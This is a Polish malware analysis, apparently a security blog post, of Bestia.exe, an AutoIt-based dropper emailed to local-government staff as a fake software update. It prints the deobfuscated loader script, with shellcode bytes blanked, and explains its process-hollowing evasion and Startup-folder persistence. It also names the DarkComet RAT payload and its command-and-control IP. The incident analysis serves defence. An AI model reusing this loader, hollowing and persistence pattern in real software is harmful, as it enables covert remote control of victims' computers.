Analiza dotyczy pliku Bestia.exe wykorzystywanego w ataku na pracowników polskich samorządów. Podczas ataku do pracowników rozsyłane były maile, w których proszeni byli oni o pobranie i uruchomienie pliku Bestia.exe mającego być aktualizacją do wykorzystywanego przez nich oprogramowania [email protected]

Analiza pliku Bestia.exe

img1

Analiza wstępna wykazała, że plik Bestia.exe jest skryptem AutoIt skompilowanym do postaci pliku wykonywalnego PE i dodatkowo spakowanym za pomocy pakera UPX. Po zdekompilowaniu skryptu AutoIt (z użyciem Exe2Aut) i przeprowadzeniu prostej deobfuskacji udało się otrzymać bardziej czytelną postać skryptu złośliwego oprogramowania.


// 1
$data = StringMid(FileRead(FileOpen(@AutoItExe, 0)), StringInStr(FileRead(FileOpen(@AutoItExe, 0)), "chiinasucjingmyarfss234") + StringLen("chiinasucjingmyarfss234"))
// 2
Local $f1 = „0x”

Local $f1_struct = DllStructCreate(„byte[” & BinaryLen($f1) & „]”)
DllStructSetData($f1_struct, 1, $f1)
Local $data_struct = DllStructCreate(„byte[” & BinaryLen($data) & „]”)
DllStructSetData($data_struct, 1, $data)

// 3
DllCall(„user32.dll”, „none”, „CallWindowProc”, „ptr”, DllStructGetPtr($f1_struct), „ptr”, DllStructGetPtr($data_struct), „int”, BinaryLen($data), „str”, „chiinasucjingmyarfss234”, „int”, 0)

// 4
Local $PE = DllStructGetData($data_struct, 1)

// 5
Local $f2 = „0x”

Local $f2_struct = DllStructCreate(„byte[” & BinaryLen($f2) & „]”)
Local $PE_struct = DllStructCreate(„byte[” & BinaryLen($PE) & „]”)
DllStructSetData($f2_struct, 1, $f2)
DllStructSetData($PE_struct, 1, $PE)

// 6
DllCall(„user32.dll”, „int”, „CallWindowProcW”, „ptr”, DllStructGetPtr($f2_struct), „wstr”,(@AutoItExe), „ptr”, DllStructGetPtr($PE_struct), „int”, 0, „int”, 0)

// 7
FileCopy(@autoitexe,@AppDataDir & „\\driver–grap.exe”,1)
FileCreateShortcut(@AppDataDir & „\\driver–grap.exe”, @StartupDir & „\\Windows.lnk”, „”, „Tooltip description of the shortcut.”, @SystemDir & „\\shell32.dll”, „”, „15”, @SW_SHOWNORMAL)

Widać, że w skrypcie wykorzystywane są dwa shellcody (2 i 5) wykonywane przez funkcję CallWindowProc, do której przekazywane są jako wskaźniki na procedurę okna (3 i 6).

Rolą pierwszego shellcodu jest zdekodowanie bloku danych odczytywanego z końca pliku Bestia.exe. Dane wyodrębniane są poprzez odnalezienie w pliku Bestia.exe ciągu znaków „chiinasucjingmyarfss234”, a następnie skopiowaniu wszystkich występujących po nim bajtów (aż do końca pliku) (1). W wyniku otrzymywany jest w pamięci obraz nowego pliku wykonywalnego PE.

img2

Nowy plik wykonywalny uruchamiany jest następnie przez drugi shellcode metodą tzw. process hollowingu. Metoda ta polega na uruchomieniu przez malware nowego procesu w trybie wstrzymanym z dowolnego pliku wykonywalnego na dysku (w tym wypadku pliku samej próbki – Bestia.exe). Następnie obraz nowego procesu w pamięci nadpisywany jest obrazem wcześniej zdekodowanego pliku wykonywalnego. Na koniec wstrzymany proces jest wznawiany. Metoda ta zmniejsza prawdopodobieństwo wykrycia właściwego payloadu przez niektóre programy antywirusowe dzięki temu, że zdekodowany plik wykonywalny nigdy nie jest zapisywany na lokalnym dysku twardym.

bestia1

Na koniec malware kopiuje swój obraz do %APPDATA%\driver–grap.exe i dodaje się do autostartu tworząc skrót Windows.lnk w katalogu autostartu (7).

Analiza payloadu

2014-03-26_081838

Następnie przeprowadzona została analiza uruchamianego przez złośliwe oprogramowanie pliku wykonywalnego (który po zdekodowaniu zrzucono do pliku dump.exe). W wyniku okazało się, że podobnie jak bazowy plik Bestia.exe jest on również spakowany pakerem UPX.

Po uruchomieniu proces dump.exe pozostaje widoczny na liście procesów i rozpoczyna próby nawiązania połączenia z IP 188.116.4.246 na porcie 81/tcp.

2014-03-26_083057
2014-03-26_082743

Dalszą analizę ułatwiło, że zarówno dla spakowanego jak i rozpakowanego pliku ClamAV wykrył sygnaturę WIN.Trojan.DarkKomet, będącego popularnym narzędziem typu RAT pozwalającym na zdalne administrowanie komputerem.

dump.exe: WIN.Trojan.DarkKomet FOUND
dump_unpacked.exe: WIN.Trojan.DarkKomet FOUND

Aby potwierdzić, czy badana próbka jest faktycznie trojanem DarkComet, na lokalnym systemie uruchomiony został serwer DarkComet v5.3. Dodatkowo lokalny adres IP został ustawiony na 188.116.4.246. Po uruchomieniu próbki serwer DarkComet v5.3 poinformował o pojawieniu się nowego klienta, co potwierdziło, że głównym payloadem był trojan DarkComet. Jednocześnie nie wykryto, by z próbką był bezpośrednio powiązany jakikolwiek inny plik wykonywalny.

bestia4

Podsumowanie

W ataku na polskie samorządy do pracowników urzędów przesyłany był spakowany skrypt AutoIt podszywający się pod oprogramowanie [email protected] W wyniku wykonania skryptu na komputerze ofiary uruchamiany był trojan DarkComet v5.3. Dzięki niemu atakujący mógł uzyskać niemal nieograniczony zdalny dostęp do zaatakowanego komputera – w szczególności mógł z tego komputera pobierać dowolne pliki bądź też zdalnie przesyłać na niego i uruchamiać inne pliki wykonywalne (np. inne złośliwe oprogramowanie). Trojan po uruchomieniu łączył się z adresem 188.116.4.246 zarządzanym przez dostawcę usług hostingowych hitme.pl. W chwili pisania analizy adres ten nie był już dłużej dostępny.